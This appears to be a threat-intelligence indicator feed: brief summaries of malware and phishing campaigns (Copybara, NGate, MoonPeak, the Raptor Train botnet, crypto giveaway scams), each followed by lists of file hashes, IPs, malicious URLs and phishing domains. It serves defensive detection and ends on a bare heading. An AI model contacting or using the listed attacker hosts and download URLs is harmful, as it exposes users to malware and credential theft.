FileHash-SHA256	d16239cfbee14a8621637934aebe2d5253fea04940d2eb082bd8dcdc41111d4b
FileHash-SHA256	d44ff1bd3c7ff81228548c82ea68c33bdea780772ce55dc4be2d4156985a326a
FileHash-SHA256	ea1945d887cbe8a56234cec6da2c46ed7a28ae6a69fd49181b3d13a71943ffd9
FileHash-SHA256	eef9f73dc7e0cdd4b1780ecd20845496a91e0f1c096264208d991935c5e97308
FileHash-SHA256	f00c85d9db7a2a2bf248771b8d81d978fa6d2153e6a3095d9c5896b604e9d00d
FileHash-SHA256	f94b8d2391b53dfb96035a2ba628224c3bfedf77021c896b64a0d7c8f2121e17
URL	http://171.22.120.50/data/Browser.txt
URL	http://171.22.120.50/data/Files.txt
URL	http://171.22.120.50/data/IDCLIPNET_x86.txt
URL	http://171.22.120.50/data/Screen.txt
URL	http://171.22.120.50/data/Social.txt
URL	http://171.22.120.50/data/USB.txt
URL	http://171.22.120.50/data/chrome_updater.txt
URL	http://prozorro.online/data/spysok_kursk.zip
URL	http://prozorro.online/info/docx/recon
URL	http://ukraero.space/jobs/download
URL	http://ukraero.space/jobs/upload
domain	prozorro.online
domain	ukraero.space

Technical Analysis of Copybara

This report presents a comprehensive technical analysis of a newly discovered variant of the Copybara Android malware. The malware, which emerged in November 2021, is primarily spread through voice phishing attacks. It utilizes the MQTT protocol for command-and-control communication and abuses Android's Accessibility Service to exert control over infected devices. The malware downloads phishing pages mimicking cryptocurrency exchanges and financial institutions to steal user credentials. The analysis covers 59 supported commands with detailed functionality descriptions, providing valuable insights into the malware's capabilities.

Type	Indicator
FileHash-MD5	03ee48f6e7f0840ef94336af579ccdf4
FileHash-MD5	112bc421690788f883e62742cd7e142a
FileHash-MD5	1150d0bf3a077be4f33eb487129d389a
FileHash-MD5	14e70653b82895367d33ec8570c9038e
FileHash-MD5	1ec0f8696578e0e427140fd256ec4e4f
FileHash-MD5	215ca929eea5866ef9e879fe37f9ce17
FileHash-MD5	215eb7fd4c261e17a696e8ba6a4061ed
FileHash-MD5	22483da70e998a316e9ac5b905b0fc9e
FileHash-MD5	271f79eb4ca49040fef16725777ac577
FileHash-MD5	28f2aaa7855c1a2d5e5ec6444fa833a9
FileHash-MD5	304f779e21b4f70f4ce70ce4dd19dbe8
FileHash-MD5	3251cb4712b6c7aeb3f48c3ef767c735
FileHash-MD5	3c90ca08d834d4650409a4282bbe6d42
FileHash-MD5	459b8182aaaf3ef14e9fd4754b40610a
FileHash-MD5	4637f70bb727b40f3d7e8be88da1f244
FileHash-MD5	4e51973921f1bf1c26b7d045d9716ae8
FileHash-MD5	4f007c674721466ff8af2d6b8b0e6040
FileHash-MD5	5391b95013437f299b6d096ad2fc96fb
FileHash-MD5	53be8d45faa3f943faf51fc95b76df5b
FileHash-MD5	5f0ce16fd6fe97db0aad3ccf70c5da82
FileHash-MD5	65040bd2de9805826d66d1ff5996ed52
FileHash-MD5	67664abfaec4d2d7e387c988d0c003ca
FileHash-MD5	68c7a9796ef7c50c56513618b6ab4f9c
FileHash-MD5	6d8af62f295ac4cfc23d20af97339440
FileHash-MD5	6eb2123c58bb283790a43b5fdaef1c25
FileHash-MD5	71896aa37e39028680b628cb05080028
FileHash-MD5	7a4e9e5692e0031e130dbc41f3d74b82
FileHash-MD5	7c203ad3d565fce177adf272d0acd373
FileHash-MD5	933a030b3d7559a41a406f52a006c30f
FileHash-MD5	93e4313edc3e70c4e50c418f1f44be80
FileHash-MD5	952af76aea0773021cfb1932245a3711
FileHash-MD5	99eee5c0856271604905dfc66fc03fca
FileHash-MD5	9aa6f175b7520878ecffe98444c1b336
FileHash-MD5	9f2e8bcc93740b9fc8122ad7abcc43c9
FileHash-MD5	a57e009fdee84765642e655e4802c288
FileHash-MD5	a9036e8521431d6f6d50ea31ccdee96d
FileHash-MD5	a95315ca7af6d857379adb2c87f27c72
FileHash-MD5	af869a4ab0bf10e528b0190a721cd7fc
FileHash-MD5	b0cc816ac58ef4e309aab3362dc6b8ab
FileHash-MD5	b1109bd86eeed5b4badd2eaf099c65f9
FileHash-MD5	b3f067b4dfea589351b3f5f25dfb1b3c
FileHash-MD5	b4b85702d206534735f85b783123dc1a
FileHash-MD5	ba1c2891d626401c5e1eb5b677ef2804
FileHash-MD5	bb2d3c26762eaa3b9c0bc1915dfe8ca0
FileHash-MD5	cb8e75a3d907ad22eec1bacafce09265
FileHash-MD5	d5b765f43eb431f3a4b8e49905282843
FileHash-MD5	eaff7697d0bc139cd3f2c2527522982e
FileHash-MD5	ed9c745a566fc35e7f24e6b70bbb57cf
FileHash-MD5	f1ae4692dfd5977fdec487bf55119008
FileHash-SHA1	00a890a7a862864dfba02fc14c4a154c7ebb3534
FileHash-SHA1	01b4ccd93e342d41c5ab357bf09472e84e256762
FileHash-SHA1	02c4b864b6263f9124ff4c38ad81f77d85785407
FileHash-SHA1	0694c99741258c9609771c544a647f6641caa138
FileHash-SHA1	0a97cbb917e9e42b369d702724549ccc3a906e81
FileHash-SHA1	0f924de937516916f5c6f64ff0548190338e264b
FileHash-SHA1	0fc8c1e2c08fd3dc83ceb72a4848c9aab66b7d57
FileHash-SHA1	11b00c50bdafd9d9a2effcd4e51655689afb0b84
FileHash-SHA1	19827b4c35bbc0e91d5c7b16b873e783139dcc11
FileHash-SHA1	22e40aac894a8218aae2f1b5eeb79473922eb97c
FileHash-SHA1	2acbf2241c6f78b0d98623d40fa40e90cb952051
FileHash-SHA1	2c4df83e48e7bc6d6141d5c5834d7fcc48d02272
FileHash-SHA1	2e83754306f1bc776d0ca3aa3d67de16c087a799
FileHash-SHA1	2fbd5167aa0194bbb8bcc4d039abd847c30b12ce
FileHash-SHA1	3c83cf0aec9a83bbb2cf9eba15f371be7fcdb6f6
FileHash-SHA1	4982a6e134a829373ac75c988b8f1717bb0782ef
FileHash-SHA1	4a541fdc55f63fbd24474587920d161af0adcf8f
FileHash-SHA1	4baaf217d259f90e9edf23e345551e6e875869a5
FileHash-SHA1	5469926232601e434617b7f0dce3fc22c9069a3b
FileHash-SHA1	57b3a92819027caf9872d1e4ea854686510dc89b
FileHash-SHA1	59e34e322dec70427df161636527eddaff09672c
FileHash-SHA1	5b002f7ce5d7b12fb72c60a8be998aeada8310aa
FileHash-SHA1	5e524201f30399d334f6149cd61092e08901abda
FileHash-SHA1	646ad65834a3190d930ba59fd9adbd3bf7934c49
FileHash-SHA1	67deca3fe3025a3b384240aa76c8c986818b21ea
FileHash-SHA1	716043927b6935f35beaffe9c0395a4141459f24
FileHash-SHA1	8698e712dc3ae9b2554f421d14e2d77323f0896a
FileHash-SHA1	87f852299fcbc26dcbd2b13863a8a6b95a7eb887
FileHash-SHA1	8b0d446fdaee497e107d35a2d04872dd9e6a9370
FileHash-SHA1	8cf89e59bb4d4723f86bee09a087cab95466a473
FileHash-SHA1	91a0c054c037eb178a26b240a0d4d235a81b638c
FileHash-SHA1	9217ec6747a7d023fc46c0cf5c6d3918941fb65f
FileHash-SHA1	9925de249b29f1aeae1b99c88d5d25c878a3805b
FileHash-SHA1	9d63128e79362c0efc2bd3c35f918e4e1dfb16d3
FileHash-SHA1	a1967b428d4473e191ac391f5c2d7c54a906e97b
FileHash-SHA1	a5cd2dd1be880362a2b376e80981aa5caf69aa7b
FileHash-SHA1	bc03f1ba99cfb61c5b09b8925fc2f7a0e9e12470
FileHash-SHA1	be2c6aeb07af97d32f2b9ae6e990e4300ca09dcb
FileHash-SHA1	c5cd9ac3cb56b8693e53ce1afb09206894e407ff
FileHash-SHA1	cbc9b927ba0569b4cd3d6cf346ccc0e535772a43
FileHash-SHA1	d09f74e066c00e30aed773f9355c7909c7a471b8
FileHash-SHA1	d4c95dd98a02e7b96c665d53de27d6c4267300e5
FileHash-SHA1	db1b313a2f6d11a651fc941c46b2d02a9b2856ff
FileHash-SHA1	db597d71ee15b475a396994ba28f4321564b5c3c
FileHash-SHA1	dee29fb458a62b82e63a8f1cc570b4b2136faa1c
FileHash-SHA1	e646d6084d89e2d9e4c62afd38df3860575388e1
FileHash-SHA1	e8575ac8924c6600e3ad00fc93f557ae63d542a8
FileHash-SHA1	f4b1595a066993ff06c849bc0faedde263c8b4cf
FileHash-SHA1	feaab9df3ccd453b31bf84e2f2d7de6cf694a84e
FileHash-SHA256	01b0e9cb7e864e753261b94e3e652254968d8188562a5abfc240d19fa783bc5f
FileHash-SHA256	0280536885bb406bc8cd90631bb48ddd809dcf16ecfb5acdc2e75c40171a63af
FileHash-SHA256	11470b5107f563c19ab92929a0e0ee5cf1b0c95fdd146f69ff9f9d4123f908cb
FileHash-SHA256	136efade44da726858480a9b56aab5a9509e7c04b71fec08e9b779c069632d8c
FileHash-SHA256	13b904ed2391fed303979b8b8fe0ac72a356cab091057600237fc8ac784db82a
FileHash-SHA256	1487cfbb6d702b8b2cfa88a6d586c092cdfbb472274ff54f894df35edd2f9d3e
FileHash-SHA256	19e74d9f5649e9180b2b32b95c654e7fe448d989a44c15c9b3c245fa3150df5a
FileHash-SHA256	1a3e682c924edc1dc0a525f7f1c3e2534cb2945dfaf5bad52089592d216c6c7b
FileHash-SHA256	22046aaef8a6439d1f5f2980b4d6282e7b69e98c95a0f52010d8953f0cb5e736
FileHash-SHA256	22988cbb286f387036ced6fca6bb72b9f5e326706ad99065bc04bb8cb5dc4a12
FileHash-SHA256	230f3d74004fee235055e786aba413abff2ed5cf4faa1987a070493be28c75d1
FileHash-SHA256	24a58d1168d02009c97095e75387765e63b320a0dde1f8a9a7c8e3689a3f6dfb
FileHash-SHA256	28323f93a6657363a0637341358303485d2cf240995457fc8393fb6b74f10d30
FileHash-SHA256	29e642ef6bd41f343f66210e924724bb343432affd1ed25bf386d638ae79ee87
FileHash-SHA256	2a1118c91d97a34e06344191eff546c062f81ccf58a7fa7bf1ec206a42d36c2b
FileHash-SHA256	2a5d05a6bfb3a73a91d88c15384c9b384d9309e8db0ed4e348d1a85d0f6729db
FileHash-SHA256	2d5e80f752608faa23f05e6558a695fcac261d78b9979d6746dc11dc995665e3
FileHash-SHA256	376ff4dbea2e3570a5cb98a8b335c0503d050fecd7bb4f65d252b1b596d14fc7
FileHash-SHA256	40df5d874ed86aa65454d3d7becc334b7ca2dcb11754f9131135071a98752691
FileHash-SHA256	41b61acc644add0a40ec6dbda231ae41f9de478fbf8cc029bc89d95a2829a53e
FileHash-SHA256	447c387fca23aea2b0b78f1cf9ee1c369078196fe3c3051bb99309268d4a9f79
FileHash-SHA256	472feeabc60fdcc87345574586a7599ead1625c94bf75f373e9086b4a6cfedbe
FileHash-SHA256	4b43f7145eebe4c07d208911b9d74c7c996a5037a04d52e4c38a80c2456d1187
FileHash-SHA256	4daf21a708afc06c0da4ee6e192a6db6405efb1e3a9eb6905cc69d501e781c8b
FileHash-SHA256	5bc6f1986a6e794e8feb78c763fef5f8cbb59f3696daa468aba058fb79befbf0
FileHash-SHA256	6b15d8508e6782c25dc48618bbbe9b53c8c9a822655a8e52b7370e034fae7564
FileHash-SHA256	6bc1ac4f844a6940c9e083c32bbf3f469b1322cc5aa83e12ab1a7f35cdb51c23
FileHash-SHA256	6da8e49d8e083ec705985effa03cdb60cdd736f04ed711211b2a3842c815a708
FileHash-SHA256	731a58248c7b467bc9d9a7482d8cb010242b3a534904ddc39471fa0620752d22
FileHash-SHA256	767e4c42cefc4a29921f612f14611cf56b7d950ba91ccdd3a59adb57f25b7d18
FileHash-SHA256	790b166081fd763cc6239881a78ba5c4d757b8f98d1b5d5f7abfdede76f54c05
FileHash-SHA256	7a165645df48f6bde0fd5939a3e15d160826d944e603c34d46a7285f02f0941e
FileHash-SHA256	7b3262b6c3ad52e50e2ec6faf1ffb12ca08f0d17ac4f90420f13a6053b7f9622
FileHash-SHA256	7fa3d58a0056e8492a84894a6fd3b3d0d87ff1f9656f5e54b10580b9a4a4fd6a
FileHash-SHA256	7ffbc88e97be67214ad17325142ceb54823a5bdcebdbd4e4c9d0c65b3f0a1813
FileHash-SHA256	85901707c7d058269820671e10af027eeadd39ee15f079cff340eed0f0ac9c2e
FileHash-SHA256	868ce8fa932c46b6de18455dfc0935a75029cc10c7b484bc358cdfabf0b0c533
FileHash-SHA256	878bb68727daf025c0c9619d1d12337c289489f1190410ca4025c47f39357aa5
FileHash-SHA256	8a2f6ff8aa1a6b416cb0aaa1530a8178c53760a69ce5c14d1d16ee880c335a4f
FileHash-SHA256	8b05684a73f44ed82c0faf424b2d41a0c7b00c2fef4d7dc232c5433739a59f6c
FileHash-SHA256	8bbb6cd5277177beb86b037ef77d6fcbae4a51a19668063d4d1b40ce2453dad3
FileHash-SHA256	91fda73902e1a2a76b999df11caa4532c9c440d6f3da63dc03e0a78109d7583a
FileHash-SHA256	9762eba15b893609b9461125c5adbcaf3bac7fea9536ffca72566abfa1bed084
FileHash-SHA256	9830b91dfcf987a2556afd85893f8569c6ba03e3ebb194ecb6b32dafbc22e1e1
FileHash-SHA256	989cf5faf307304f86db03180978ba4bd93c909bb458db83fcebe4fb48d7a002
FileHash-SHA256	9b204f839aed79d4c27f8d28198ef596dec9848a27a51f0672743a91e618677c
FileHash-SHA256	9c136701362e2d661805257c02e23c9aa01b9081e1a559571f947390522fc51b
FileHash-SHA256	9f693923e5641c046bdcadf10b4e2b553d078b98afc2e30f2d72660b1e0161ed
FileHash-SHA256	a1a1fbdb6070ff388642974b1616d1955c2a89fbb8702caa02fa6927adbdad6c
FileHash-SHA256	a46537ccf4a188091f973a47b7186ee805539a0e5d94c62867cec08cec1c33e6
FileHash-SHA256	a8cc088426c6406f03ccedbb854e8dc83543d38c98a405db15074e9531731ade
FileHash-SHA256	ab85b62cad1a4009bf99c621b4950ee23c413b5c424952f225497bca7a318a99
FileHash-SHA256	ad1182d8bf3b1976e09f45b91085167559bc24e8f5e3f7315f96f344532cbcf8
FileHash-SHA256	afa3c43141a5b6f2473d49cdfa0bce1bf0af235a40f3ec092299287291137841
FileHash-SHA256	b009ad0ed336f1e4bff3f452e238b3ea83d3bc7773f52d16d057298c116a95ea
FileHash-SHA256	b1b6a2d91e6fcc07322edce92aa75c13763b6844b2a1a549eeaf0f536bdc6183
FileHash-SHA256	b217e4f8143a6fbbad2e0667ce8242fc207274a78ce464af9b122df8ba12690b
FileHash-SHA256	b4379324c7dc1fc623bcd9d2e8099dc3588ac23f87f33151d1c1005a1f33e713
FileHash-SHA256	b5c206d8f980c8fa12a29886fad49f6a1469264055740cdf763efa7f726cd8d7
FileHash-SHA256	b99fc0a9eea993d6b5a04b0a0b05fe103f164fb85281fcddb04ac686daee065f
FileHash-SHA256	bcae6ea26fe1dd1fa5652e05c1b888186307ad277ce238a255908061b837a484
FileHash-SHA256	bff6fb5cbb1c0f8d05e2c6acefcf499a9c22f10d7db8aeda994638bf75018fbf
FileHash-SHA256	c32eb3b850a20e4715a6db40635de9fc6cefad840ce7e64e9c68c2b3e378ee7e
FileHash-SHA256	c8c73080a2eb18ad1434ac408e916f3f819637550dfe07f20ad79e66ec1b2cf9
FileHash-SHA256	cad56908abd1508451a5af4a5304de092f0342ec6a24bbbeb9b3988683483c84
FileHash-SHA256	d23ef9fe27b116d982f8ebafb99587ffc9cc6c9b932f1b2d5efab2dad156e65e
FileHash-SHA256	d852f48e1c8a37d11f9dfb90f339316a5a3fa012bf152db43de1e81b45a69ba7
FileHash-SHA256	d887be78f443fabeb348ac2f85e1d42ed4d1c2cfc87d9e314c4b812c0b1fcfd8
FileHash-SHA256	de242d9428a378a1b0dacb2e8d481fdfb062a47450f815c13e105975d5a41663
FileHash-SHA256	e097bb08da761ae5780e6c600c79738e36285a59589098dde53c88611c1ac66a
FileHash-SHA256	e328dde9fa6db3da195e813696973657cc4fe636601cb0061a75c5086b04aa95
FileHash-SHA256	e3875e3b20be42f38f457cf0b0d85683535472b47535635ec42da52b73b27e6e
FileHash-SHA256	e57565bd3f398508321470f857dfb07c195ed9b7b494ba00dc7c407ac8b8f3e1
FileHash-SHA256	e82b0023abcc4bdb549f319389620c4cbd8ffabe8648168db31db62fd84a6904
FileHash-SHA256	eb1f89b2edaeda18023a6ea5cd7a4b2997e4839e1f3d57e54c5b7a1b64407874
FileHash-SHA256	eb779ec4ed2c85e114a18db89b8ef9c7a19adc907748d1f18076e167f79bf04b
FileHash-SHA256	f6975b1a9ab8935d45d6c2d94540b67b2374827734593c126785924afffb6634
FileHash-SHA256	f703f31f7b9ef95f820a724ebcee36377e2f4a42c92756b819bea6f34ec96cac
FileHash-SHA256	f91fd4f9b6594446144ba865356fde07669ea0b46a62ddd926bb8cac0aa04dc9
domain	clienti-dati.com
domain	clienti-verifica.com
domain	datos-cliente.com
domain	descarga-app-sign.com
domain	descargar-e-instalar.com
domain	enlace-cliente.com
domain	entrar-y-confirmar.com
domain	generali-verifica.com
domain	installa-app.com
domain	la-mia-app.com
domain	la-nuova-app.cc
domain	scarica-app-token.com
domain	scarica-app.icu
domain	scarica-app.site

NGate Android malware relays NFC traffic to steal cash

ESET researchers uncovered a crimeware campaign targeting bank customers in Czechia. The NGate Android malware can relay NFC data from victims' payment cards to attackers' devices, enabling unauthorized ATM withdrawals. It's the first time this capability has been observed in the wild. The campaign evolved from using phishing PWAs and WebAPKs to deploying NGate, which tricks victims into providing banking details and NFC card data.

Type	Indicator
FileHash-SHA1	0c799950ec157bb775637fb3a033a502f211e62e
domain	raiffeisen-cz.eu
hostname	app.mobil-csob-cz.eu
hostname	csob-93ef49e7a.tbc-app.life
hostname	geo-4bfa49b2.tbc-app.life
hostname	george.tbc-app.life
hostname	nfc.cryptomaker.info
hostname	rb-62d3a.tbc-app.life
hostname	rb.2f1c0b7d.tbc-app.life
hostname	rb.system.com

Be careful what you wish for – Phishing in PWA applications

ESET analysts dissected a novel phishing method tailored to Android and iOS users, combining standard phishing delivery techniques with a novel approach of targeting mobile users via Progressive Web Applications (PWAs) and WebAPKs. Insidiously, installing these phishing PWAs and WebAPKs does not trigger warnings about installing third-party applications. Most of the observed applications targeted clients of Czech banks, but some also targeted banks in Hungary and Georgia. Two different threat actors were determined to be operating the campaigns based on their distinct command-and-control infrastructures.

Type	Indicator
domain	blackrockapp.eu
domain	cyrptomaker.info
domain	hide-me.online
domain	play-protect.pro
hostname	csas.georgecz.online
FileHash-SHA1	d3d5ae6b8ae9c7c1f8690452760745e18640150d
FileHash-SHA1	66f97405a1538a74cee4209e59a1e22192bc6c08

MoonPeak malware unveils new details on attacker infrastructure

Cisco Talos has uncovered a campaign employing a new malware family called 'MoonPeak,' a remote access trojan actively developed by a North Korean advanced persistent threat group tracked as 'UAT-5394.' The analysis reveals the evolution of MoonPeak from an open-source malware called XenoRAT, with the threat actors introducing modifications to evade detection and analysis. Talos mapped the infrastructure used in this campaign, including command and control servers, payload hosting sites, and virtual machines for testing implants, unveiling the tactics, techniques, and procedures employed by UAT-5394.

Type	Indicator
FileHash-MD5	535f59bc95fe3efc22abf5036c60ade0
FileHash-MD5	571c577595223518fd5a3ee8b36928d7
FileHash-MD5	60e8ed6c37e1fe9742a49916e07002e5
FileHash-MD5	9924b24434e2d92d0fc3b683006cbad1
FileHash-MD5	a470afe2f7176694553158bcd3decb53
FileHash-MD5	ca005ebe9454f30c2cedd73080677f56
FileHash-MD5	d3dd07f2454b9c81d9d16e65d6f24000
FileHash-MD5	e8ab7a58f35cae486d61c94910faa4fa
FileHash-MD5	ee1dca47840fbab6d8956ef97f352496
FileHash-MD5	fcbc07e56f496e836c29833b89a23fce
FileHash-SHA1	0eb6b3fa6f054d46158133c89df5eb5b30a37dfb
FileHash-SHA1	1f2fa02f4e71b27700888cee750d4681bd858b2a
FileHash-SHA1	2092423079ac375a59cd3cb320ca6d21d6732ed6
FileHash-SHA1	2ab49cbc1f4518e3368712a960c49a3e24975351
FileHash-SHA1	3495faeddcc98fc770bb9b275314234c8aae8502
FileHash-SHA1	63e9a16b0f4e7d8b290b95aec4cf3773f6e001df
FileHash-SHA1	7c837e382597a42244002062a6adf1f71417fbbe
FileHash-SHA1	8c1249d410a42319aa24cb9bdc0ab2cf4bca4342
FileHash-SHA1	a896a8140562c9e93828320d2a198a6dc24a453e
FileHash-SHA1	af1c0acd817a53e9ec1c8cd081cd3b112205e2ec
FileHash-SHA256	0b8897103135d92b89a83093f00d1da845a1eae63da7b57f638bab48a779808e
FileHash-SHA256	0ed643a30a82daacecfec946031143b962f693104bcb7087ec6bda09ade0f3cb
FileHash-SHA256	148c69a7a1e06dc06e52db5c3f5895de6adc3d79498bc3ccc2cbd8fdf28b2070
FileHash-SHA256	15eee641978ac318dabc397d9c39fb4cb8e1a854883d8c2401f6f04845a79b4b
FileHash-SHA256	1ad43ddfce147c1ec71b37011d522c11999a974811fead11fee6761ceb920b10
FileHash-SHA256	27202534cc03a398308475146f6710b790aa31361931d4fe1b495c31c3ed54f7
FileHash-SHA256	293b1a7e923be0f554ec44c87c0981c9b5cf0f20c3ad89d767f366afb0c1f24a
FileHash-SHA256	2b35ef3080dcc13e2d907f681443f3fc3eda832ae66b0458ca5c97050f849306
FileHash-SHA256	3e39fc595db9db1706828b0791161440dc1571eaa07b523df9b721ad65e2369b
FileHash-SHA256	4108c5096a62c0a6664eed781c39bb042eb0adf166fcc5d64d7c89139d525d4f
FileHash-SHA256	41d4f7734fbf14ebcdf63f51093718fd5a22ec38a297c0dc3d7704a3fb48b3f9
FileHash-SHA256	44e492d5b9c48c1df7ef5e0fe9a732f271234219d8377cf909a431a386759555
FileHash-SHA256	458641936e2b41c425161a9b892d2aa08d1de2bc0db446f214b5f87a6a506432
FileHash-SHA256	4599a9421e83fb0e2c005e5d9ac171305192beabe965f3385accaf2647be3e8e
FileHash-SHA256	58fdc1b6ce4744d6331f8e2efc4652d754e803cae4cc16101fc78438184995e6
FileHash-SHA256	6a3839788c0dafe591718a3fb6316d12ccd8e82dbcb41ce40e66b743f2dd344d
FileHash-SHA256	6bf8a19deb443bde013678f3ff83ab9db4ddc47838cd9d00935888e00b30cee6
FileHash-SHA256	72a25d959d12e3efe9604aee4b1e7e4db1ef590848d207007419838ddbad5e3f
FileHash-SHA256	8a4fbcdec5c08e6324e3142f8b8c41da5b8e714b9398c425c47189f17a51d07b
FileHash-SHA256	97ba8d30cf8393c39f61f7e63266914ecafd07bd49911370afb866399446f37d
FileHash-SHA256	a80a35649f638049244a06dd4fb6eca4de0757ef566bfbe1affe1c8bf1d96b04
FileHash-SHA256	b8233fe9e903ca08b9b1836fe6197e7d3e98e36b13815d8662de09832367a98a
FileHash-SHA256	f4aa4c6942a87087530494cba770a1dcbc263514d874f12ba93a64b1edbae21c
FileHash-SHA256	f928a0887cf3319a74c90c0bdf63b5f79710e9f9e2f769038ec9969fcc8ee329
FileHash-SHA256	facf3b40a2b99cc15eee7b7aee3b36a57f0951cda45931fcde311c0cc21cdc71
domain	nmailhostserver.store
domain	nsonlines.store
domain	pumaria.store
domain	yoiroyse.store

Russia-linked crypto threat actor involved in political spoofing tracked

A Russia-linked threat actor is deploying domains for crypto scams targeting the US Presidential Election and prominent tech brands. The scams involve fake Bitcoin and Ethereum giveaways, asking users to send coins to attacker-controlled wallets with false promises of doubling returns. A large cluster of domains featuring US political figures, business leaders, and global brands has been discovered, using counterfeit legal letters from US agencies to add legitimacy. Targets include Donald Trump, Kamala Harris, Tim Cook, Elon Musk, and others. The campaign involves spoofed websites, CAPTCHA protection, and chat functions. Some domains feature Russian language content. The threat actor uses Cloudflare for hosting and has registered domains with a Russian email address.

Type	Indicator
domain	apple-event2024.com
domain	btcstarship.com
domain	cryptologic.online
domain	debate.gives
domain	trumpdebate24.com
hostname	musk.trump.io

Derailing the Raptor Train

A large, multi-tiered botnet called Raptor Train, likely operated by Chinese threat actors Flax Typhoon, has been discovered. Consisting of over 60,000 compromised SOHO and IoT devices at its peak, it's one of the largest Chinese state-sponsored IoT botnets to date. The botnet uses a sophisticated control system called Sparrow to manage its infrastructure and execute various tasks. While no DDoS attacks have been observed, the botnet has targeted U.S. and Taiwanese entities in sectors like military, government, education, and telecommunications. The network architecture includes three tiers: compromised devices, exploitation and C2 servers, and management nodes. Campaigns have evolved over four years, showing increasing sophistication in tactics and scale.

Type	Indicator
CVE	CVE-2024-21887
IPv4	45.92.70.111
IPv4	45.92.70.112
IPv4	45.92.70.113
IPv4	45.92.70.115
IPv4	45.92.70.68
IPv4	45.92.70.71
IPv4	185.207.154.253
IPv4	23.236.68.161
IPv4	23.236.69.110
IPv4	23.236.69.82
IPv4	45.10.58.133
IPv4	45.13.199.104
IPv4	45.13.199.152
IPv4	45.13.199.45
IPv4	45.80.215.149
IPv4	5.188.33.228
IPv4	65.20.97.251
IPv4	85.90.216.110
IPv4	92.38.178.232
IPv4	92.38.185.45
FileHash-SHA256	2aa12e5989065951be84ce932b65bd197dd6be3fa987838bad48536c0c74d145
FileHash-SHA256	546390a3a296154e36051dda745b573658311f9831789bb1faca411a3803a9bb
FileHash-SHA256	c6fe1748e68923f278926ee8679aaee22800b9c93c38641d12ea0e945e116bb0
IPv4	104.244.89.157
IPv4	114.255.70.20
IPv4	114.255.70.30
IPv4	139.180.137.219
IPv4	14.1.98.223
IPv4	149.248.51.22
IPv4	155.138.133.56
IPv4	155.138.151.225
IPv4	185.14.45.160
IPv4	195.234.62.18
IPv4	195.234.62.184
IPv4	195.234.62.188
IPv4	195.234.62.19
IPv4	195.234.62.192
IPv4	195.234.62.197
IPv4	195.234.62.198
IPv4	202.182.109.151
IPv4	207.148.122.69
IPv4	207.148.68.131
IPv4	210.61.186.117
IPv4	223.98.159.112
IPv4	23.236.68.193
IPv4	23.236.68.213
IPv4	23.236.68.229
IPv4	37.61.229.15
IPv4	37.61.229.17
IPv4	37.9.35.89
IPv4	45.10.58.128
IPv4	45.10.58.129
IPv4	45.10.58.130
IPv4	45.10.58.132
IPv4	45.13.199.140
IPv4	45.13.199.207
IPv4	45.13.199.84
IPv4	45.13.199.96
IPv4	45.135.117.131
IPv4	45.135.117.136
IPv4	45.77.231.209
IPv4	45.80.215.150
IPv4	45.80.215.151
IPv4	45.80.215.152
IPv4	45.80.215.154
IPv4	45.80.215.155
IPv4	45.80.215.156
IPv4	45.80.215.186
IPv4	45.80.215.47
IPv4	5.181.27.19
IPv4	5.181.27.21
IPv4	5.181.27.219
IPv4	5.181.27.6
IPv4	5.188.33.135
IPv4	5.45.184.68
IPv4	78.141.238.97
IPv4	85.90.216.111
IPv4	85.90.216.112
IPv4	85.90.216.115
IPv4	85.90.216.116
IPv4	85.90.216.69
IPv4	89.44.198.195
IPv4	89.44.198.200
IPv4	89.44.198.254
IPv4	91.216.190.154
IPv4	91.216.190.2
IPv4	91.216.190.247
IPv4	91.216.190.74
IPv4	91.216.190.80
IPv4	92.223.30.232
IPv4	92.223.30.233
IPv4	92.223.30.241
IPv4	92.38.135.146
IPv4	92.38.176.131
IPv4	92.38.176.156
IPv4	92.38.185.43
IPv4	92.38.185.44
IPv4	92.38.185.46
IPv4	92.38.185.47
domain	adjsn.com
domain	amdord.com
domain	aqakffj.com
domain	bcdkwwuah.com
domain	bkhqwfhtu.com
domain	blepmhnay.com
domain	bxgtbv.com
domain	clqqknzb.com
domain	cvgeuwo.com
domain	cvmnomvxm.com
domain	dkuwbcen.com
domain	dvujvkfu.com
domain	ecvkiehs.com
domain	eufcj.com
domain	fajxtg.com
domain	ftcexq.com
domain	glxxet.com
domain	gmhrxhc.com
domain	grntjr.com
domain	hersrr.com
domain	hfsdln.com
domain	hy1025.com
domain	hy229.com
domain	hy30.com
domain	hy324.com
domain	hy42.com
domain	hy424.com
domain	hy529.com
domain	hy619.com
domain	hy811.com
domain	hy830.com
domain	hy92.com
domain	hyddh.com
domain	iycwqot.com
domain	jgnsqihc.com
domain	jkwxcc.com
domain	kmgzbowwg.com
domain	lfzupr.com
domain	lofeuq.com
domain	lomuzs.com
domain	lznmihdej.com
domain	mudvw.com
domain	mvxnspcqr.com
domain	nhcmdikkd.com
domain	nmfagp.com
domain	obqlibg.com
domain	oicdsgjxz.com
domain	omviak.com
domain	oploz.com
domain	osiso.com
domain	qjknpv.com
domain	qsxgzu.com
domain	rnjca.com
domain	saoadlg.com
domain	sbuybjv.com
domain	sreudcnb.com
domain	ttcyci.com
domain	tvcvhzyk.com
domain	ujrtkw.com
domain	vbbrfvhrg.com
domain	vgbgwzmr.com
domain	wndaoyk.com
domain	woaba.com
domain	wvsezu.com
domain	ykcmewapc.com
domain	ysubryfv.com
domain	zuszr.com
hostname	aewreiuicajo.w8510.com
hostname	apdfhhjcxcb.w8510.com
hostname	api.k3121.com
hostname	awbpxtpi.w8510.com
hostname	awerdasvbjgrt.b2047.com
hostname	awqx.k3121.com
hostname	axqw.k3121.com
hostname	ayln.b2047.com
hostname	bzbatflwb.w8510.com
hostname	firc.b2047.com
hostname	hnai.k3121.com
hostname	hume.b2047.com
hostname	hyjk.k3121.com
hostname	kliscjaisdjhi.w8510.com
hostname	kuyw.b2047.com
hostname	lfdx.k3121.com
hostname	lyblqwesfawe.w8510.com
hostname	mail.k3121.com
hostname	mjiudwajhkf.w8510.com
hostname	nulp.k3121.com
hostname	ocmnusdjdik.w8510.com
hostname	oklm.k3121.com
hostname	qwsd.k3121.com
hostname	tuisasdcxzd.w8510.com
hostname	voias.b2047.com
hostname	wmllxwkg.w8510.com
hostname	xaqw.k3121.com
hostname	xbqw.k3121.com
hostname	xxqw.b2047.com
hostname	zasdfgasd.w8510.com
hostname	zdacasdc.w8510.com
hostname	zdacxzd.w8510.com

Kimsuky: A Gift That Keeps on Giving

